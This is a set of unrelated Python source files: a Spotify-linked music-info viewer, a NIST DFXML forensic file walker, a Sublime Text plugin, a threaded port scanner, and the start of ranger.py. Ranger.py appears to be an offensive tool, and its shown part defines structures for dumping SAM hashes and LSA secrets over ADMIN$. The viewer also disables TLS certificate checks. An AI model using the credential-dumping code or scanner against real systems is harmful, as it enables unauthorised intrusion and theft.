self.current_playing, self.playback_title_x, self.playback_title_y
)
self.update_artist_info(update_playback=False)
self.update_album_info(update_playback=False)
self.update_song_info(update_playback=False)
def update_artist_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on artist:
Bio, News, Social Media, Images
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.musikki_artist = musikki.search(self.get_current_artist())
self.musikki_artist.get_full_bio(self.bio_nam)
self.musikki_artist.get_news(self.news_nam)
self.musikki_artist.get_social_media_twitter(self.social_nam)
self.images_frame.clear_images_list()
self.get_images()
def update_song_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on song:
Lyrics
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.get_lyrics()
def update_album_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on album:
Reviews: Pitchfork, Metacritic
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.get_pitchfork_review()
self.get_metacritic_review()
def update_current_playing(self):
"""
Update formatted playback, artist, song and album strings from Spotify.
"""
self.current_playing = self.get_current_playing()
self.current_artist = self.get_current_artist()
self.current_song = self.get_current_song()
self.current_album = self.get_current_album()
print('='*60, '\n\n-----Now Playing-----')
print('Artist:\t', self.current_artist)
print('Song:\t', self.current_song)
print('Album:\t', self.current_album, '\n')
def get_lyrics(self, url=''):
"""Make an async request to Genius.com for lyrics.
Args:
url (str) -- Either the url we know or the one returned in a 301 response.
"""
artist, song = self.format_unicode_alpha([self.current_artist, self.current_song])
print('Searching lyrics for: ', artist, ' - ', song)
if url == '':
url = "https://genius.com/%s-%s-lyrics" % (artist.replace(' ', '-'), song.replace(' ', '-'))
req = QtNetwork.QNetworkRequest(QtCore.QUrl(url))
self.lyrics_nam.get(req)
def set_lyrics(self, url='', lyrics_exist=True):
"""Make synchronous lyrics request, then set text in the lyrics frame.
Args:
url (str) -- URL to request lyrics if not using default URL
lyrics_exist (bool) -- Don't make request for lyrics if you know they don't exist.
"""
error = "Error: Could not find lyrics."
proxy = urllib.request.getproxies()
# remove punctuation and convert to English alphabet
artist, song = self.format_unicode_alpha([self.current_artist, self.current_song])
if lyrics_exist:
try:
if url == '':
url = "https://genius.com/%s-%s-lyrics"%(artist.replace(' ', '-'),song.replace(' ', '-'))
lyricspage = requests.get(url, proxies=proxy)
soup = BeautifulSoup(lyricspage.text, 'html.parser')
lyrics = soup.text.split(' Lyrics')[3].split('More on Genius')[0]
if artist.lower().replace(" ", "") not in soup.text.lower().replace(" ", ""):
lyrics = error
self.lyrics_frame.set_results(True)
except Exception:
lyrics = error
else:
lyrics = error
# set those lyrics on the frame
self.lyrics_frame.set_display_text(lyrics, 10, 45, 'lyrics_text')
def format_unicode_alpha(self, strings):
"""Removes punctuation and replaces non-English alphabet chars with closest equivalent.
Args:
strings (list:str) -- A list of strings or single string to be formatted
"""
formatted_strings = []
is_list = True
if isinstance(strings, str):
is_list = False
strings = [strings]
for s in strings:
s = unidecode.unidecode(s)
s = s.translate(str.maketrans('','',string.punctuation))
formatted_strings.append(s)
return (formatted_strings if is_list else formatted_strings[0])
def update_review_frame(self, review):
"""Reviews Handler.
Args:
review (str:object) -- Either Pitchfork formatted string or a metacritic.Review object
Review object consists of the following:
artist album date critic_rating critic_count user_rating user_count img_url
"""
# Pitchfork frame
if isinstance(review, str):
self.review_frame.set_results(True)
self.review_frame.set_display_text(review)
# Metacritic frame (any non-string review object)
else:
default_image = QPixmap(os.path.dirname(__file__)+'/info-icon.png')
if not review.has_review:
self.metacritic_frame.default_metacritic_content(default_image)
else:
try:
album_image = urllib.request.urlopen(review.img_url).read()
except:
album_image = default_image
review.pixmap = album_image
self.metacritic_frame.add_metacritic_content(review)
print('\n-----Metacritic Results-----')
print(review.artist, ' - ', review.album)
print('Critic Score:\t', review.critic_rating, '\t(',review.critic_count,' reviews)')
print('User Score:\t', review.user_rating, '\t(',review.user_count,' reviews)\n')
def update_images_frame(self, images):
"""Images handler.
Args:
images (list) -- List of QPixmaps
"""
if len(images) > 0:
# add image scrolling buttons
self.images_frame.create_image_buttons()
self.images_frame.get_image_next_button().clicked.connect(self.next_image_handler)
self.images_frame.get_image_prev_button().clicked.connect(self.prev_image_handler)
self.images_frame.get_image_next_button().show()
self.images_frame.get_image_prev_button().show()
# add the flickr images
self.images_frame.add_flickr_artist_images(images)
def lyrics_handler(self, reply):
"""Lyrics handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
if reply.rawHeader(QByteArray(b'Status')) == '301 Moved Permanently':
qbyteurl = reply.rawHeader(QByteArray(b'Location'))
url = ''
for q in qbyteurl:
url += q
# parse the html for lyrics
self.set_lyrics(url)
elif reply.rawHeader(QByteArray(b'Status')) != '200 OK':
print('response not a 301 or 200. it is: ', reply.rawHeader(QByteArray(b'Status')))
else:
self.set_lyrics(url='', lyrics_exist=False)
def news_handler(self, reply):
"""News handler.
Args:
reply (object) -- QNetworkReply
"""
default_img = os.path.dirname(__file__) + '/info-icon.png'
results = {}
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
if len(json_resp['summary'].toObject()['errors'].toArray()) == 0 \
and json_resp['summary'].toObject()['result_count'].toInt() > 0:
counter = 0
resultlist = []
for r in json_resp['results'].toArray():
if counter < 1:
r = r.toObject()
results['author'], name = [], ''
if r['author_info'] != '':
try:
if r['author_info'].toObject()['name'] != '':
name = r['author_info'].toObject()['name'].toString()
except:
name = ''
results['author'] = name
results['source'], avatar, title = [],'',''
if r['source'] != '':
if r['source'].toObject()['title'] != '':
results['src_title'] = r['source'].toObject()['title'].toString()
if r['source'].toObject()['avatar'].toString() != '':
avatar = r['source'].toObject()['avatar'].toString()
results['source'].extend([avatar, title])
results['date'], year, month, day = '','','',''
if r['publish_date'] != '':
try:
if str(r['publish_date'].toObject()['year'].toInt()) != '':
year = str(r['publish_date'].toObject()['year'].toInt())
if str(r['publish_date'].toObject()['month'].toInt()) != '':
month = str(r['publish_date'].toObject()['month'].toInt())
if str(r['publish_date'].toObject()['day'].toInt()) != '':
day = str(r['publish_date'].toObject()['day'].toInt())
except:
year, month, day = '0000', '00', '00'
results['date'] = year +'-'+ month +'-'+ day
results['mkid'] = ''
if str(r['mkid'].toInt()) != '':
results['mkid'] = str(r['mkid'].toInt())
results['title'] = ''
if r['title'].toString() != '':
results['title'] = r['title'].toString()
results['newsurl'] = ''
if r['url'].toString() != '':
results['newsurl'] = r['url'].toString()
results['summary'] = ''
if r['summary'].toString() != '':
results['summary'] = r['summary'].toString()
results['imgurl'] = ''
if r['image'].toString() != '':
results['imgurl'] = r['image'].toString()
try:
url = results['imgurl']
r = requests.get(url, stream=True)
filename = os.path.dirname(__file__)+'/images/'+results['title']+'.jpg'
with open(filename, 'wb') as fd:
for chunk in r.iter_content(chunk_size=128):
fd.write(chunk)
results['newsicon'] = QPixmap(filename)
except BaseException as e:
print(e)
results['newsicon'] = QPixmap(default_img)
else:
break
resultlist.append(results)
counter += 1
# end for
results['found'] = True
try:
results['newsicon'] = results['newsicon'] if results['newsicon'] else QPixmap(default_img)
except:
results['newsicon'] = QPixmap(default_img)
self.news_frame.add_news(results)
#end if
else:
print('No news found')
results['found'] = False
results['message'] = 'No news for this artist.'
self.news_frame.add_news(results, QPixmap(default_img))
else:
print('No news found')
results['found'] = False
results['message'] = 'No news for this artist.'
self.news_frame.add_news(results, QPixmap(default_img))
def search_bio_handler(self, reply):
"""Biography handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
bio = ''
for f in json_resp['full'].toArray():
f = f.toObject()
paragraph = ''
for i, t in enumerate(f['text'].toArray()):
t = t.toString()
paragraph += f['title'].toString()+'\n\n'+t.rstrip() if i==0 else (' '+t.rstrip())
bio += paragraph + '\n\n'
self.bio_frame.set_results(True)
self.bio_frame.set_display_text(bio, 10, 45, 'bio_text')
else:
self.bio_frame.set_display_text('No artist bio found.', 10, 45)
def musikki_images_handler(self, reply):
"""Musikki images handler.
Args:
reply (object) -- QNetworkReply
"""
urls, pixmaps, widths, heights = [], [], [], []
er = reply.error()
notfound_count = 0
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
if len(json_resp['results'].toArray()) > 0:
f = json_resp['results'].toArray()
thumb = f[0].toObject()['thumbnails'].toArray()[0].toObject()
thumb_url = thumb['url'].toString()
thumb_width = thumb['width'].toInt()
thumb_height = thumb['height'].toInt()
try:
context = ssl._create_unverified_context()
data = urlopen(thumb_url, context=context).read()
pixmap = QPixmap()
pixmap.loadFromData(data)
pixmaps.append(pixmap)
except:
notfound_count += 1
urls.append(thumb_url)
widths.append(thumb_width)
heights.append(thumb_height)
if notfound_count > 0:
print(notfound_count, " 404 responses in image handler")
if len(pixmaps) > 0:
# load the biggest image as the first and only pixmap
biggest = 0
for i, p in enumerate(pixmaps):
if p.width() > biggest:
biggest = i
pixmaps[0] = pixmaps[biggest]
widths[0] = widths[biggest]
heights[0] = heights[biggest]
self.images_frame.add_musikki_artist_images(pixmaps, widths, heights)
def social_handler(self, reply):
"""Social handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
found = True
try:
service_name = json_resp['service_name'].toString()
except:
found = False
service_name = ''
try:
year = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['year'].toInt()
month = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['month'].toInt()
day = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['day'].toInt()
except:
year, month, day = 0, 0, 0
date = str(month) + '/' + str(day) + '/' + str(year)
try:
content = json_resp['timeline_posts'].toArray()[0].toObject()['content'].toString()
except:
content = ''
social_text = date + ' - via ' + service_name + '\n\n' + content
if found:
self.social_frame.set_display_text(social_text, 10, 45, 'social_text')
self.musikki_artist.twitter_search = False
elif self.musikki_artist.facebook_search == False:
# Nothing usable from Twitter yet: fall back to a Facebook search.
self.musikki_artist.get_social_media_facebook(self.social_nam)
else:
self.social_frame.set_display_text('No social media found.', 10, 45)
self.musikki_artist.facebook_search = False
def next_image_handler(self):
self.images_frame.next_image()
def prev_image_handler(self):
self.images_frame.prev_image()
def update_playback_display(self):
"""
Playback handler.
"""
if self.current_playing != self.get_current_playing():
if (self.current_artist == self.get_current_artist() and
self.current_song != self.get_current_song()):
if self.current_album != self.get_current_album():
print('Album change...')
self.update_album_info(update_playback=True)
self.update_song_info(update_playback=False)
else:
print('Song change...')
self.update_song_info(update_playback=True)
else:
print('Artist and song change...')
self.update_everything()
elif (self.current_artist == self.get_current_artist() and
self.current_album != self.get_current_album()):
print('Album changed but song & artist did not...')
self.update_album_info(update_playback=True)
self.update_song_info(update_playback=False)
def expand_bio(self):
if self.bio_frame.has_results():
self.build_popup(self.bio_frame)
else:
print('No bio results, so no bio popup')
def expand_lyrics(self):
if self.lyrics_frame.has_results():
self.build_popup(self.lyrics_frame)
else:
print('No lyrics results, so no lyrics popup')
def expand_review(self):
if self.review_frame.has_results():
self.build_popup(self.review_frame)
else:
print('No review results, so no review popup')
def build_popup(self, source_frame):
"""Build a SingleFrameWindow popup window.
Args:
source_frame (object) -- model.Frame is the content for the popup
"""
offset = 50
self.popup_window = view.SingleFrameWindow(self.screen_width, self.screen_height)
self.popup_window.init_popup(
self.window_x-offset, self.window_y-offset, source_frame.display_title, 'single_frame_window'
)
source_frame.create_popup(self.popup_window)
self.popup_window.add_frame(source_frame)
self.popup_window.show()
def open_spotify(self):
spotify = playback.Playback()
return spotify
def play_pause(self):
self.spotify.play_pause()
def next(self):
self.spotify.next()
def prev(self):
self.spotify.prev()
def pause(self):
self.spotify.pause()
def get_current_artist(self):
return self.spotify.get_current_artist()
def get_current_song(self):
return self.spotify.get_current_song()
def get_current_album(self):
return self.spotify.get_current_album()
def get_current_playing(self):
return self.get_current_artist() + ' - ' + self.get_current_song()
class Listener(QThread):
"""Listener object that can run playback synchronization threads.
Args:
stored_song (str) -- formatted string (Artist - Song Title)
spotify (object) -- playback.Playback object which connects and talks to Spotify
"""
song_change = pyqtSignal()
def __init__(self, stored_song, spotify):
super().__init__()
self.stored_song = stored_song.rstrip()
self.spotify = spotify
# start a synchronization thread that will close when app does
self.playback_sync_thread = Thread(target=self.sync_playback)
self.playback_sync_thread.setDaemon(True)
def run(self):
self.playback_sync_thread.start()
def sync_playback(self):
"""
Every 1 second, check the stored_song against what Spotify is currently playing.
"""
while True:
if self.stored_song != self.spotify.get_current_playing().rstrip():
self.song_change.emit()
self.stored_song = self.spotify.get_current_playing().rstrip()
sleep(1)
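# Illustrative sketch (not part of the original controller): a stand-alone version
# of the string normalisation performed by Controller.format_unicode_alpha() above --
# transliterate to the closest ASCII characters with unidecode, then strip
# punctuation so the result can be embedded in Genius/Pitchfork URLs.
def _example_normalize_for_url(text):
    ascii_text = unidecode.unidecode(text)                                   # e.g. 'Beyoncé' -> 'Beyonce'
    return ascii_text.translate(str.maketrans('', '', string.punctuation))   # drop punctuation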
|
walk_to_dfxml.py
|
#!/usr/bin/env python3
# This software was developed at the National Institute of Standards
# and Technology in whole or in part by employees of the Federal
# Government in the course of their official duties. Pursuant to
# title 17 Section 105 of the United States Code portions of this
# software authored by NIST employees are not subject to copyright
# protection and are in the public domain. For portions not authored
# by NIST employees, NIST has been granted unlimited rights. NIST
# assumes no responsibility whatsoever for its use by other parties,
# and makes no guarantees, expressed or implied, about its quality,
# reliability, or any other characteristic.
#
# We would appreciate acknowledgement if the software is used.
"""Walk current directory, writing DFXML to stdout."""
__version__ = "0.4.1"
import os
import stat
import hashlib
import traceback
import logging
import sys
import collections
_logger = logging.getLogger(os.path.basename(__file__))
import dfxml.objects as Objects
#Exclude md6 from hash list borrowed from Objects.py - hashlib doesn't support md6.
walk_default_hashes = Objects.FileObject._hash_properties - {"md6"}
def filepath_to_fileobject(filepath, **kwargs):
"""
Optional arguments:
* ignore_properties - dictionary of property names to exclude from FileObject.
"""
global walk_default_hashes
fobj = Objects.FileObject()
ignore_properties = kwargs.get("ignore_properties", dict())
#_logger.debug("ignore_properties = %r." % ignore_properties)
#Determine type - done in three steps.
if os.path.islink(filepath):
name_type = "l"
elif os.path.isdir(filepath):
name_type = "d"
elif os.path.isfile(filepath):
name_type = "r"
else:
        #Not determined yet; finish the type determination with the stat structure below.
name_type = None
# Retrieve stat struct for file to finish determining name type, and later to populate properties.
if name_type == "l":
sobj = os.lstat(filepath)
else:
sobj = os.stat(filepath)
#_logger.debug(sobj)
if name_type is None:
if stat.S_ISCHR(sobj.st_mode):
name_type = "c"
elif stat.S_ISBLK(sobj.st_mode):
name_type = "b"
elif stat.S_ISFIFO(sobj.st_mode):
name_type = "p"
elif stat.S_ISSOCK(sobj.st_mode):
name_type = "s"
elif stat.S_ISWHT(sobj.st_mode):
name_type = "w"
else:
raise NotImplementedError("No reporting check written for file type of %r." % filepath)
_should_ignore = lambda x: Objects.FileObject._should_ignore_property(ignore_properties, name_type, x)
if not _should_ignore("name_type"):
fobj.name_type = name_type
#Prime fileobjects from Stat data (lstat for soft links).
fobj.populate_from_stat(sobj, ignore_properties=ignore_properties, name_type=name_type)
#Hard-coded information: Name, and assumed allocation status.
if not _should_ignore("filename"):
fobj.filename = filepath
if not _should_ignore("alloc"):
fobj.alloc = True
if not _should_ignore("link_target"):
if name_type == "l":
fobj.link_target = os.readlink(filepath)
#Add hashes for (mostly regular) files.
if name_type in ["-", "r", "v"]:
        # Only open and hash the file if at least one hash property is not ignored.
        if any(not _should_ignore(x) for x in walk_default_hashes):
try:
with open(filepath, "rb") as in_fh:
chunk_size = 2**22
md5obj = hashlib.md5()
sha1obj = hashlib.sha1()
sha224obj = hashlib.sha224()
sha256obj = hashlib.sha256()
sha384obj = hashlib.sha384()
sha512obj = hashlib.sha512()
any_error = False
while True:
buf = b""
try:
buf = in_fh.read(chunk_size)
except Exception as e:
any_error = True
if not _should_ignore("error"):
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
buf = b""
if buf == b"":
break
if not _should_ignore("md5"):
md5obj.update(buf)
if not _should_ignore("sha1"):
sha1obj.update(buf)
if not _should_ignore("sha224"):
sha224obj.update(buf)
if not _should_ignore("sha256"):
sha256obj.update(buf)
if not _should_ignore("sha384"):
sha384obj.update(buf)
if not _should_ignore("sha512"):
sha512obj.update(buf)
if not any_error:
if not _should_ignore("md5"):
fobj.md5 = md5obj.hexdigest()
if not _should_ignore("sha1"):
fobj.sha1 = sha1obj.hexdigest()
if not _should_ignore("sha224"):
fobj.sha224 = sha224obj.hexdigest()
if not _should_ignore("sha256"):
fobj.sha256 = sha256obj.hexdigest()
if not _should_ignore("sha384"):
fobj.sha384 = sha384obj.hexdigest()
if not _should_ignore("sha512"):
fobj.sha512 = sha512obj.hexdigest()
except Exception as e:
if not _should_ignore("error"):
if fobj.error is None:
fobj.error = ""
else:
fobj.error += "\n"
fobj.error += "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
return fobj
def main():
global walk_default_hashes
#Determine whether we're going in threading mode or not. (Some modules are not available by default.)
using_threading = False
if args.jobs > 1:
using_threading = True #(unless supporting modules are absent)
try:
import threading
        except ImportError:
using_threading = False
_logger.warning("Threading support not available. Running in single thread only.")
try:
import queue
        except ImportError:
using_threading = False
_logger.warning("Python queue support not available. (If running Ubuntu, this is in package python3-queuelib.) Running in single thread only.")
dobj = Objects.DFXMLObject(version="1.2.0")
dobj.program = sys.argv[0]
dobj.program_version = __version__
dobj.command_line = " ".join(sys.argv)
dobj.dc["type"] = "File system walk"
dobj.add_creator_library("Python", ".".join(map(str, sys.version_info[0:3]))) #A bit of a bend, but gets the major version information out.
dobj.add_creator_library("Objects.py", Objects.__version__)
dobj.add_creator_library("dfxml.py", Objects.dfxml.__version__)
# Key: property.
# Value: set of name_types that should have the property ignored. "*" indicates all. No sets should be empty by the end of this setup.
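    # Example (matching the --ignore help text below): {"inode": {"*"}, "mtime": {"d"}}
    # ignores inode numbers for every name_type and mtime only for directories.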
ignore_properties = collections.defaultdict(set)
if args.ignore:
for property_descriptor in args.ignore:
property_descriptor_parts = property_descriptor.split("@")
property_name = property_descriptor_parts[0]
if len(property_descriptor_parts) == 1:
ignore_properties[property_name].add("*")
else:
ignore_properties[property_name].add(property_descriptor_parts[-1])
if args.ignore_hashes:
for property_name in walk_default_hashes:
ignore_properties[property_name].add("*")
#_logger.debug("ignore_properties = %r." % ignore_properties)
filepaths = set()
filepaths.add(".")
for (dirpath, dirnames, filenames) in os.walk("."):
dirent_names = set()
for dirname in dirnames:
dirent_names.add(dirname)
for filename in filenames:
dirent_names.add(filename)
for dirent_name in sorted(dirent_names):
#The relpath wrapper removes "./" from the head of the path.
filepath = os.path.relpath(os.path.join(dirpath, dirent_name))
filepaths.add(filepath)
fileobjects_by_filepath = dict()
if using_threading:
#Threading syntax c/o: https://docs.python.org/3.5/library/queue.html
q = queue.Queue()
threads = []
def _worker():
while True:
filepath = q.get()
if filepath is None:
break
try:
fobj = filepath_to_fileobject(filepath, ignore_properties=ignore_properties)
except FileNotFoundError as e:
fobj = Objects.FileObject()
fobj.filename = filepath
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
fileobjects_by_filepath[filepath] = fobj
q.task_done()
for i in range(args.jobs):
t = threading.Thread(target=_worker)
t.start()
threads.append(t)
for filepath in filepaths:
q.put(filepath)
# block until all tasks are done
q.join()
# stop workers
for i in range(args.jobs):
q.put(None)
for t in threads:
t.join()
else: #Not threading.
for filepath in sorted(filepaths):
fobj = filepath_to_fileobject(filepath, ignore_properties=ignore_properties)
fileobjects_by_filepath[filepath] = fobj
#Build output DFXML tree.
for filepath in sorted(fileobjects_by_filepath.keys()):
dobj.append(fileobjects_by_filepath[filepath])
dobj.print_dfxml()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-i", "--ignore", action="append", help="Do not track named property on file objects. E.g. '-i inode' will exclude inode numbers from DFXML manifest. Can be given multiple times. To exclude a fileobject property of a specific file type (e.g. regular, directory, device), supply the name_type value in addition; for example, to ignore mtime of a directory, '-i mtime@d'.")
parser.add_argument("--ignore-hashes", action="store_true", help="Do not calculate any hashes. Equivalent to passing -i for each of %s." % (", ".join(sorted(walk_default_hashes))))
parser.add_argument("-j", "--jobs", type=int, default=1, help="Number of file-processing threads to run.")
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.jobs <= 0:
raise ValueError("If requesting multiple jobs, please request 1 or more worker threads.")
main()
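# Example invocations (illustrative only; the flags are defined above):
#   python3 walk_to_dfxml.py > walk.dfxml
#   python3 walk_to_dfxml.py -i inode -i mtime@d -j 4 > walk.dfxml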
|
onstart.py
|
"""
plugin_loaded: run custom start-up actions when Sublime Text loads.
"""
import sublime
import threading
def my_func():
"""Can run any function on Sublime start and make any initial actions"""
sublime.status_message('Sublime started...')
def plugin_loaded():
t = threading.Thread(target=my_func)
t.daemon = True
t.start()
|
tools.py
|
import json
import socket
import sys
import threading
try: # Python 3
    from queue import Queue
except ImportError: # Python 2
    from Queue import Queue
class Scanner(object):
q = Queue()
storage = []
def __init__(self, target, threads, known, rang, inp, out):
self.target = target
self.threads = threads
self.rang = rang
self.known = known
self.lib_ports = json.loads(inp.read())
self.output = out
def check_target(self):
try:
ip = socket.gethostbyname(self.target)
except socket.gaierror:
            print('Target does not exist or DNS lookup failed.')
            sys.exit(1)
else:
print('\nChecking: {target} as {ip}\n'.format(target=self.target, ip=ip))
print('=======Start_Scanning=======', file=self.output)
print('\nChecking: {target} as {ip}\n'.format(target=self.target, ip=ip), file=self.output)
def echo(self):
for port in self.storage:
            if self.known or str(port) in self.lib_ports:
print('Port : {port} is open. ({desc})'.format(port=port, desc=self.lib_ports[str(port)]))
print('Port : {port} is open. ({desc})'.format(port=port, desc=self.lib_ports[str(port)]),
file=self.output)
else:
print('Port : {port} is open.'.format(port=port))
print('Port : {port} is open.'.format(port=port), file=self.output)
def port_scan(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
try:
s.connect((self.target, port))
except socket.timeout:
pass
except socket.error:
pass
else:
self.storage.append(port)
finally:
s.close()
def threader(self):
while True:
worker = self.q.get()
self.port_scan(worker)
self.q.task_done()
def run(self):
self.check_target()
for x in range(self.threads):
t = threading.Thread(target=self.threader)
t.daemon = True
t.start()
if self.known:
for port, desc in self.lib_ports.items():
self.q.put(int(port))
else:
for worker in range(1, self.rang):
self.q.put(worker)
self.q.join()
self.storage.sort()
self.echo()
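# Illustrative usage sketch (not part of the original module). The file names and
# the JSON layout ({"80": "http", ...}) are assumptions based on how __init__ and
# echo() read lib_ports:
#
#     with open('ports.json') as inp, open('scan.txt', 'w') as out:
#         scanner = Scanner('example.com', threads=100, known=True, rang=1024, inp=inp, out=out)
#         scanner.run()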
|
ranger.py
|
#!/usr/bin/env python
'''
Libraries
'''
import base64, sys, argparse, re, subprocess, os, time, logging, signal, urllib2, cmd, ntpath, socket, string, random, ConfigParser, hashlib, traceback, tempfile, collections
import xml.etree.ElementTree as etree
from threading import Thread, Lock, Event
from Queue import Queue
from struct import unpack, pack
try:
import netifaces
except:
sys.exit("[!] Install the netifaces library: pip install netifaces")
try:
import nmap
except:
sys.exit("[!] Install the python-nmap library: pip install python-nmap")
try:
import netaddr
except:
sys.exit("[!] Install the netaddr library: pip install netaddr")
try:
from Crypto.Cipher import DES, ARC4, AES
from Crypto.Hash import HMAC, MD4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
logging.critical("See http://www.pycrypto.org/")
try:
from impacket import smbserver, version, ntlm, uuid, winregistry, smbconnection
from impacket.smbconnection import *
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.examples import remcomsvc, serviceinstall, logger
from impacket.dcerpc.v5 import transport, scmr, wkst, srvs, samr, rpcrt, rrp
from impacket.dcerpc import ndrutils, atsvc
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.structure import Structure
from impacket.ese import ESENT_DB
from impacket.winregistry import hexdump
#from impacket.smbconnection import SMBConnection
except Exception as e:
print("[!] The following error occured %s") % (e)
sys.exit("[!] Install the necessary impacket libraries and move this script to the examples directory within it")
'''
This pre-section contains the code from the impacket libraries and examples.
This code falls under the licenses prescribed by that code distribution.
'''
'''
IMPACKET SECRETSDUMP
'''
# Structures
# Taken from http://insecurety.net/?p=768
class SAM_KEY_DATA(Structure):
structure = (
('Revision','<L=0'),
('Length','<L=0'),
('Salt','16s=""'),
('Key','16s=""'),
('CheckSum','16s=""'),
('Reserved','<Q=0'),
)
class DOMAIN_ACCOUNT_F(Structure):
structure = (
('Revision','<L=0'),
('Unknown','<L=0'),
('CreationTime','<Q=0'),
('DomainModifiedCount','<Q=0'),
('MaxPasswordAge','<Q=0'),
('MinPasswordAge','<Q=0'),
('ForceLogoff','<Q=0'),
('LockoutDuration','<Q=0'),
('LockoutObservationWindow','<Q=0'),
('ModifiedCountAtLastPromotion','<Q=0'),
('NextRid','<L=0'),
('PasswordProperties','<L=0'),
('MinPasswordLength','<H=0'),
('PasswordHistoryLength','<H=0'),
('LockoutThreshold','<H=0'),
('Unknown2','<H=0'),
('ServerState','<L=0'),
('ServerRole','<H=0'),
('UasCompatibilityRequired','<H=0'),
('Unknown3','<Q=0'),
('Key0',':', SAM_KEY_DATA),
# Commenting this, not needed and not present on Windows 2000 SP0
# ('Key1',':', SAM_KEY_DATA),
# ('Unknown4','<L=0'),
)
# Great help from here http://www.beginningtoseethelight.org/ntsecurity/index.htm
class USER_ACCOUNT_V(Structure):
structure = (
('Unknown','12s=""'),
('NameOffset','<L=0'),
('NameLength','<L=0'),
('Unknown2','<L=0'),
('FullNameOffset','<L=0'),
('FullNameLength','<L=0'),
('Unknown3','<L=0'),
('CommentOffset','<L=0'),
('CommentLength','<L=0'),
('Unknown3','<L=0'),
('UserCommentOffset','<L=0'),
('UserCommentLength','<L=0'),
('Unknown4','<L=0'),
('Unknown5','12s=""'),
('HomeDirOffset','<L=0'),
('HomeDirLength','<L=0'),
('Unknown6','<L=0'),
('HomeDirConnectOffset','<L=0'),
('HomeDirConnectLength','<L=0'),
('Unknown7','<L=0'),
('ScriptPathOffset','<L=0'),
('ScriptPathLength','<L=0'),
('Unknown8','<L=0'),
('ProfilePathOffset','<L=0'),
('ProfilePathLength','<L=0'),
('Unknown9','<L=0'),
('WorkstationsOffset','<L=0'),
('WorkstationsLength','<L=0'),
('Unknown10','<L=0'),
('HoursAllowedOffset','<L=0'),
('HoursAllowedLength','<L=0'),
('Unknown11','<L=0'),
('Unknown12','12s=""'),
('LMHashOffset','<L=0'),
('LMHashLength','<L=0'),
('Unknown13','<L=0'),
('NTHashOffset','<L=0'),
('NTHashLength','<L=0'),
('Unknown14','<L=0'),
('Unknown15','24s=""'),
('Data',':=""'),
)
class NL_RECORD(Structure):
structure = (
('UserLength','<H=0'),
('DomainNameLength','<H=0'),
('EffectiveNameLength','<H=0'),
('FullNameLength','<H=0'),
('MetaData','52s=""'),
('FullDomainLength','<H=0'),
('Length2','<H=0'),
('CH','16s=""'),
('T','16s=""'),
('EncryptedData',':'),
)
class SAMR_RPC_SID_IDENTIFIER_AUTHORITY(Structure):
structure = (
('Value','6s'),
)
class SAMR_RPC_SID(Structure):
structure = (
('Revision','<B'),
('SubAuthorityCount','<B'),
('IdentifierAuthority',':',SAMR_RPC_SID_IDENTIFIER_AUTHORITY),
('SubLen','_-SubAuthority','self["SubAuthorityCount"]*4'),
('SubAuthority',':'),
)
def formatCanonical(self):
ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority']['Value'][5]))
for i in range(self['SubAuthorityCount']):
ans += '-%d' % ( unpack('>L',self['SubAuthority'][i*4:i*4+4])[0])
return ans
class LSA_SECRET_BLOB(Structure):
structure = (
('Length','<L=0'),
('Unknown','12s=""'),
('_Secret','_-Secret','self["Length"]'),
('Secret',':'),
('Remaining',':'),
)
class LSA_SECRET(Structure):
structure = (
('Version','<L=0'),
('EncKeyID','16s=""'),
('EncAlgorithm','<L=0'),
('Flags','<L=0'),
('EncryptedData',':'),
)
class LSA_SECRET_XP(Structure):
structure = (
('Length','<L=0'),
('Version','<L=0'),
('_Secret','_-Secret', 'self["Length"]'),
('Secret', ':'),
)
# Classes
class RemoteFile():
def __init__(self, smbConnection, fileName):
self.__smbConnection = smbConnection
self.__fileName = fileName
self.__tid = self.__smbConnection.connectTree('ADMIN$')
self.__fid = None
self.__currentOffset = 0
def open(self):
self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName)
def seek(self, offset, whence):
        # TODO: implement whence fully; for now offsets are always from the beginning of the file
if whence == 0:
self.__currentOffset = offset
def read(self, bytesToRead):
if bytesToRead > 0:
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
self.__currentOffset += len(data)
return data
return ''
def close(self):
if self.__fid is not None:
